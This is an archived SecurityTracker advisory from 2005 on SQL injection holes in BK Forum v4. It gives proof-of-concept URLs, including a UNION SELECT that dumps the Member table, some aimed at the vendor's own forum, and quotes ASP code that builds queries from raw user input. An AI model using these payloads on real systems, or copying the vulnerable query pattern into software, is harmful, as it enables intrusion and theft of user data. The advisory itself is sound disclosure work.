SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  BK Forum Vendors:  Black Knight Development
BK Forum Input Validation Holes Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013793
SecurityTracker URL:  http://securitytracker.com/id?1013793
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 25 2005
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 4
Description:  Diabolic Crab reported an input validation vulnerability in BK Forum. A remote user can inject SQL commands.

Several scripts do not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where %20memName%20=%20'dc'

http://[target]/forum.asp?forum='SQL INJECTION

Also, the 'register.asp' script does not validate any of the form values.
Impact:  A remote user can execute SQL commands on the underlying database.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.bkdev.net/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Windows (Any)
Reported By:  "Diabolic Crab" <dcrab@hackerscenter.com>
Message History:   None.

 Source Message Contents
Date:  Sat, 23 Apr 2005 13:14:25 +0530
From:  "Diabolic Crab" <dcrab@hackerscenter.com>
Subject:  Multiple Sql injection vulnerabilities in BK Forum v.4

 
 
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
 
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digi
talparadox.org/services.ah
 
Severity: High
Title: Multiple Sql injection vulnerabilities in BK Forum v.4
Date: 23/04/2005
 
Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.
 
 
Proof of Concept Exploits:
 
http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20
'dc'
       [CODE]
       id = request.querystring("id")
        sql = "select * from Member where memID = " & id
        set rs = conn.execute(sql)
       [/CODE]
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION
       [CODE]
        id = request.querystring("id")
        sql = "select * from Member where memID = " & id
        set rs = conn.execute(sql)
       [/CODE]
http://forum.bkdev.net/register.asp
 
All the form values are vulnerable to sql injection
       [CODE]
         sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, m
emHomepage, " & _
                                                                        "memDate, memLevel, memS
ignature, memPic, memAbout, memAcceptNotification, memShowAvatar, 
memLoggedOn, " & _
                                                                        "memLastActive) values (
'" & memname & "', '" & mempw & "', '" & firstname &
 "', '" & lastname & "', " & _
                                                                        "'" & email &
 "', '" & homepage & "', #" & now & "#, " & LEVEL_M
EMBER & ", '" & signature & "', " & _
                                                                        "'" & picture &
 "', '" & about & "', " & notify & ", " & avatar &
 ", " & false & ", #" & now & "#)"
       [/CODE]
 
 
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
 
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding 
these vulnerabilities. You can find me at, http://www.hackerscenter.com or 
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with 
php.
 
Sincerely,
Diabolic Crab
Web Security,  Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org
 
This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure.
If you have received it by mistake please let us know by e-mail
immediately and delete it from your system; should also not copy
the message nor disclose its contents to anyone. Many thanks.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC